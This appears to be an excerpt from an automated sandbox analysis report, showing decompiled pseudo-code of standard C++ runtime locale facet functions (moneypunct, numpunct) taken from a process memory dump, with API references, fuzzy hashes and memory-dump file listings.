0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e
0x6d48ce81
0x6d48ce81
0x6d48ce84
0x6d48ce88
0x6d48ce8c
0x6d48ce99
0x6d48cea1
0x6d48cea3
0x00000000
0x6d48cea3
0x6d48ce6a
0x6d48ce6a
0x00000000
0x6d48ce6a
0x6d48ce68
0x6d48cddb
0x6d48cddb
0x6d48cdde
0x6d48cde2
0x6d48cde6
0x6d48cdf3
0x6d48cdfb
0x6d48cdfd
0x00000000
0x6d48cdfd
0x6d48cdc4
0x6d48cdc4
0x00000000
0x6d48cdc4
0x6d48cdc2

APIs

__EH_prolog3.LIBCMT ref: 6D48CD8B
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: f4e6934f1362a731deb536f6b2cbbc41be17c4cc225528db01eceed5306e3b79
Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: f4e6934f1362a731deb536f6b2cbbc41be17c4cc225528db01eceed5306e3b79
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6D48CE2A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;
				void* _t158;

				_t141 = __edx;
				_t110 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t154 - 0x14, 0);
				_t147 =  *0x6d53fe44; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6D451D10();
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6D476A77(_t154 - 0x14);
					return E6D490E67(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6D48D439(__ebx, _t113, __edx, _t143, _t147, __eflags, _t158) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t154 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t143, _t147);
							E6D476A10(_t154 - 0x14, 0);
							_t148 =  *0x6d53fe4c; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6D451D10();
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6D476A77(_t154 - 0x14);
								return E6D490E67(_t144);
							} else {
								__eflags = _t148;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6D48D4BE(_t110, _t120, __edx, _t144, _t148, __eflags, _t158) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t154 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t110, _t144, _t148);
										E6D476A10(_t154 - 0x14, 0);
										_t149 =  *0x6d53fe50; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6D451D10();
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6D452140( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6D476A77(_t154 - 0x14);
											return E6D490E67(_t145);
										} else {
											__eflags = _t149;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6D48D52A(_t110, _t127, __edx, _t145, _t149, __eflags, _t158) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t154 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(4);
													E6D490E9E(0x6d4fefbc, _t110, _t145, _t149);
													_t150 = _t154 - 0x20;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_push( *((intOrPtr*)(_t154 + 8)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6d5044f4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6D48E2BD(_t110, _t154 - 0x20, _t141, _t145, _t150,  *_t49, _t158);
													return E6D490E67(_t150);
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6D478A0B(__eflags, _t145);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6d53fe50 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6D478A0B(__eflags, _t144);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6d53fe4c = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6D478A0B(__eflags, _t143);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6d53fe44 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6d48ce2a
0x6d48ce2a
0x6d48ce2a
0x6d48ce31
0x6d48ce3b
0x6d48ce40
0x6d48ce4b
0x6d48ce4f
0x6d48ce52
0x6d48ce57
0x6d48ce5b
0x6d48ce60
0x6d48ce64
0x6d48cea9
0x6d48ceac
0x6d48ceb8
0x6d48ce66
0x6d48ce68
0x6d48ce6e
0x6d48ce74
0x6d48ce7c
0x6d48ce7f
0x6d48cebc
0x6d48ceca
0x6d48cecf
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf06
0x6d48cf08
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e
0x6d48ce81
0x6d48ce81
0x6d48ce84
0x6d48ce88
0x6d48ce8c
0x6d48ce99
0x6d48cea1
0x6d48cea3
0x00000000
0x6d48cea3
0x6d48ce6a
0x6d48ce6a
0x00000000
0x6d48ce6a
0x6d48ce68

APIs

__EH_prolog3.LIBCMT ref: 6D48CE31
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 90ae342df3806ccb6d2ba1fc140c9d6ee9d16d5702404f655b589d6797e95c69
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 90ae342df3806ccb6d2ba1fc140c9d6ee9d16d5702404f655b589d6797e95c69
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480E80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;
				void* _t246;

				_t223 = __edx;
				_t172 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t242 - 0x14, 0);
				_t231 =  *0x6d53fdf4; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6D451D10();
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6D476A77(_t242 - 0x14);
					return E6D490E67(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6D48290F(__ebx, _t175, __edx, _t225, _t231, __eflags, _t246) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t242 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t225, _t231);
							E6D476A10(_t242 - 0x14, 0);
							_t232 =  *0x6d53fe10; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6D451D10();
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6D476A77(_t242 - 0x14);
								return E6D490E67(_t226);
							} else {
								__eflags = _t232;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6D48298A(_t172, _t182, __edx, _t226, _t232, __eflags, _t246) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t242 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t172, _t226, _t232);
										E6D476A10(_t242 - 0x14, 0);
										_t233 =  *0x6d53fde0; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6D451D10();
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6D476A77(_t242 - 0x14);
											return E6D490E67(_t227);
										} else {
											__eflags = _t233;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6D4829F6(_t172, _t189, __edx, _t227, _t233, __eflags, _t246) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t242 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t172, _t227, _t233);
													E6D476A10(_t242 - 0x14, 0);
													_t234 =  *0x6d53fe14; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6D451D10();
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6D476A77(_t242 - 0x14);
														return E6D490E67(_t228);
													} else {
														__eflags = _t234;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6D482A62(_t172, _t196, _t223, _t228, _t234, __eflags, _t246) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t242 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t172, _t228, _t234);
																E6D476A10(_t242 - 0x14, 0);
																_t235 =  *0x6d53fde4; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6D451D10();
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6D476A77(_t242 - 0x14);
																	return E6D490E67(_t229);
																} else {
																	__eflags = _t235;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6D482AC8(_t172, _t203, _t223, _t229, _t235, __eflags, _t246) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6D451940();
																			E6D4924F4(_t242 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(4);
																			E6D490E9E(0x6d4fefbc, _t172, _t229, _t235);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_push( *((intOrPtr*)(_t242 + 8)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6d5041ac;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6D4868B7(_t172, _t207, _t223, _t229, _t236,  *_t77, _t246);
																			return E6D490E67(_t236);
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6D478A0B(__eflags, _t229);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6d53fde4 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6D478A0B(__eflags, _t228);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6d53fe14 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6D478A0B(__eflags, _t227);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6d53fde0 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6D478A0B(__eflags, _t226);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6d53fe10 = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6D478A0B(__eflags, _t225);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6d53fdf4 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6d480e80
0x6d480e80
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb1
0x6d480eb6
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe

APIs

__EH_prolog3.LIBCMT ref: 6D480E87
std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 4444746f45c933f5d176d02378e3df0d57fc44abe27114a65cafa22fbcc55210
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 4444746f45c933f5d176d02378e3df0d57fc44abe27114a65cafa22fbcc55210
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D4809F6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;
				void* _t554;

				_t510 = __edx;
				_t389 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t550 - 0x14, 0);
				_t525 =  *0x6d53fe0c; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6D451D10();
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6D476A77(_t550 - 0x14);
					return E6D490E67(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6D4825C5(__ebx, _t392, __edx, _t512, _t525, __eflags, _t554) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t550 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t512, _t525);
							E6D476A10(_t550 - 0x14, 0);
							_t526 =  *0x6d53fe08; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6D451D10();
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6D476A77(_t550 - 0x14);
								return E6D490E67(_t513);
							} else {
								__eflags = _t526;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6D482649(_t389, _t399, __edx, _t513, _t526, __eflags, _t554) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t550 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t389, _t513, _t526);
										E6D476A10(_t550 - 0x14, 0);
										_t527 =  *0x6d53fddc; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6D451D10();
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6D476A77(_t550 - 0x14);
											return E6D490E67(_t514);
										} else {
											__eflags = _t527;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6D4826CE(_t389, _t406, __edx, _t514, _t527, __eflags, _t554) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t550 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t389, _t514, _t527);
													E6D476A10(_t550 - 0x14, 0);
													_t528 =  *0x6d53fdd8; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6D451D10();
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6D452140( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6D476A77(_t550 - 0x14);
														return E6D490E67(_t515);
													} else {
														__eflags = _t528;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6D482752(_t389, _t413, _t510, _t515, _t528, __eflags, _t554) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
